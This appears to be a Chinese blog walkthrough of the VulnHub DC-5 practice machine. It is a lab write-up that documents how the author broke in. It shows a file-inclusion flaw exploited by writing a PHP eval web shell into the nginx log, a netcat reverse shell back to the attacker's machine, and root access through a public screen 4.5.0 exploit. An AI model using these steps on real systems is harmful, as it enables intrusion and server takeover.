Vulnhub靶机渗透测试——DC-5

已于 2022-05-11 21:55:51 修改
阅读量979 收藏 1
点赞数
文章标签: 安全 linux 运维
于 2022-05-11 21:11:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chiza2596/article/details/124711163
版权

一、实验环境

攻击机(kali): 192.168.189.148

靶机(ubuntu): 192.168.189.184
靶机下载地址:https://www.vulnhub.com/entry/dc-5,314/

二、信息收集

1、使用nmap进行存活主机探测

nmap 192.168.189.0/24

2、发现IP192.168.189.184开放80,111端口,再次使用nmap对其进行扫描

nmap 192.168.189.184 -sV -T4 -A -p-

3、访问其80端口

4、浏览页面并没有发现可以进行漏洞利用的地方,使用御剑对其进行目录扫描

5、挨个访问扫描出的目录 ,发现footer.php目录是刚才我们没有浏览过的,但是他只有一个类似于版权信息的东西,并没有什么有价值的

6、回到我们的网站、在concat.php下是唯一我们可以进行交互的地方,随便提交一个东西上去

7、在我们提交之后,网页跳转到了thankyou.php目录下,但是除了带了一些参数之外还是没有发现有价值的东西,再提交一次之后我们发现一个细节,就是网站最下面的版权信息发生了变化。

 8、回到之前的footer.php目录下,刷新网页发现这里的信息也会发现改变

9、这里我们猜测是thankyou.php文件中包含了footer.php文件,所以在thankyou.php目录下可能会存在文件包含漏洞,然后可以我们fuzz下文件包含的参数

 10、通过fuzz我们可以知道文件包含的参数为file

三、漏洞利用

1、利用文件包含来读取文件

http://192.168.189.184/thankyou.php?file=/etc/passwd

2、通过上述操作我们确定该站点存在文件包含漏洞,且参数为file,在之前我们通过nmap的扫描结果可以知道该站点的web服务器为nginx,所以我们可以去包含nginx的日志文件

Nginx的默认访问日志文件为 /var/log/nginx/access.log

3、我们可以将将一句话木马写入到php的日志文件中,然后去包含日志文件

我们先写一个phpinfo验证一下

<?php phpinfo();?>

 写入一句话木马

<?php @eval($_POST['cmd']);?>

4、使用蚁剑连接

 5、反弹shell到kali

nc -e /bin/bash 192.168.189.148 7777

 6、利用python起一个交互式页面

python -c "import pty;pty.spawn('/bin/bash')"

四、权限提升

1、查看哪些命令有suid 权限

find / -user root -perm -4000 -print 2>/dev/null

 2、我们可以发现screen的文件,在kali中搜索相关的漏洞

searchsploit screen 4.5.0

 3、将该41154.sh文件拷贝下来

mkdir screen
cp /usr/share/exploitdb/exploits/linux/local/41154.sh /root/screen

 4、以记事本方式打开41154.sh文件,将其中的代码分为3个部分

5、 三个文件创建完成之后,根据文件中的提示内容进行编译(这里记得修改路径)

gcc -fPIC -shared -ldl -o libhax.so libhax.c 
gcc -o rootshell rootshell.c

6、编译完成之后,将编译后生成的文件和run.sh文件通过蚁剑上传到目标站点

7、上传之后运行run.sh文件即可获得一个root权限

chmod 777 run.sh
./run.sh

8、成功拿到flag

小陈是个憨憨
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhubdc5
qq_54030686的博客
06-13 308
这个靶场延续了dc系列一贯直白的套路,直接提升权限,实际操作中还是存在着一些未能解决的问题,话不多说,直接干 官方wp地址 主机发现 这里介绍一下 ip地址之后的24,代表24个字节,A段,B段,C段各占8个字节,也就是每一个段共有256个数字,检测B段的话,0/16,检测A段的0/8 目标为139,本机IP为128,进行端口检测 不知道为什么,我这边多个了45530端口,有可能是因为我做完的缘故,但是不影响,共有三个端口80为http服务,111为rpcbind服务,45530不晓得是哪个服务 谷歌大法中
DC-5靶机
最新发布
mlws1900的博客
03-25 602
得知文件包含漏洞,我们可以在ssh日志,中间件日志以及临时文件中写入一句话木马然后进行包含,即可解析。我们可以利用nginx日志写入一句话木马。切换nat模式,有问题全选重试和是,打到这了,我感觉这个配置我都不用写了,启动靶机如下图所示即可。啥玩意没有,点击contact,发现一个留言板,测试了xss啥也没有。以上操作要在bp中发包,我直接在浏览器中修改,不知道为什么无法写入。如上图所示,我试了在浏览器中无法写入日志,打开蚁剑连接shell。上面那个没试过,下面这个试了成功, 都需要在bp中进行操作。
VulnHub靶场~DC-5
里丘~班诺的小屋
05-15 737
0X00 靶机的环境搭配 攻击机(Kali):192.168.238.130 靶机(DC-5):192.168.138 靶机地址:DC: 5 ~ VulnHub 0X01 信息收集 一、IP扫描 ┌──(root㉿kali)-[~] └─#arp-scan -l 二、端口扫描 ┌──(root㉿kali)-[~] └─# nmap -T4 -sV -O -A 192.168.238.138 三、网站目录扫描 ┌──(root㉿kali)...
看完这篇 教你玩转渗透测试靶机vulnhub——DC5
Aluxian_的博客
03-25 6173
Vulnhub靶机DC5渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:文件包含: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC5,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址: https://download.vulnhub.co
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-12 1672
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
Vulnhub靶机DC-5
Innocence_0的博客
09-11 142
下载环境导入靶机,在kali里面扫描靶机ip地址靶机IP:192.168.190.133扫描端口:开放了两个tcp端口,我们访问一下ip在下载靶机的时候说明了只有一个flag,我们在页面试试,发现contact页面评论后会出现thankyou.php而且每次刷新下方的显示不同,扫描一下后台访问footer.php同样是每次刷新后内容不同,那猜测下方的年份显示可能是调用文件后返回的数值,尝试一下文件包含,发现成功文件包含。
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
网络渗透测试实验四
weixin_63154145的博客
11-20 758
CTF实践
Vulnhub靶机练习DC-5 完整复现
黑战士的博客
02-23 892
注:最后提权那步失败了,若有大佬看到此文,还望指出问题,不胜感激!由于本靶机被搁置一段时间,IP地址会有变化故:192.168.200.11和92.168.200.58 都是靶机IP地址。
Vulnhub靶机:DC-5渗透详细过程
IerkeU的博客
03-08 5895
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-5,314/ DC-5是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,需要具备中级的渗透测试技巧,只有一个可利用的入口点(也没有 SSH),你需要观察一些不寻常的(会随页面动态刷新的)东西,你的最终目标是放在root目录下的flag。 靶场攻略 信息收集 扫描c段发现目标主
VulnHub——DC-5(具体漏洞详解)
高野02blog
12-29 1066
DC-5 这是DC-5的描述,从中得到一些关键信息。 开始 nmap扫描 确定IP地址后端口扫描 发现80端口 使用kali自带工具dirbuster遍历目录 AWVS对网站扫描并没发现重大漏洞 发现只有以下这个界面存在交互 访问footer.php页面时发现了描述中会随着页面刷新改变的东西 我们猜测thankyou.php中incloude()包含了footer.php, 如果是动态包含的路径就可能存在LFI漏洞 什么是本地文件包含(LFI)漏洞? LFI允许攻击者通过浏览器包含一个服务器
vulnhub】---DC-5靶机
qq_43168364的博客
08-21 381
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机DC-5靶机(192.168.15.) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 命令:arp-scan -l 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 收集到的相关信息: *
vulnhub--DC5
weixin_55129870的博客
05-19 271
kali ip :192.168.44.131 主机发现 nmap -sP 192.168.44.0/24 DC-5 IP:192.168.44.145 端口探测 nmap -A -p1-65535 -T4 192.168.44.145 发现有一个80端口和111端口并且运行着rpcinfo服务,44040 访问http服务 发现留言板 提交XSS没有反应,但是提交时,底部时间会刷新变化 dirsearch 扫描 dirsearch是一个基于pyth...
vulnhub靶机——raven: 2
09-03
- *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值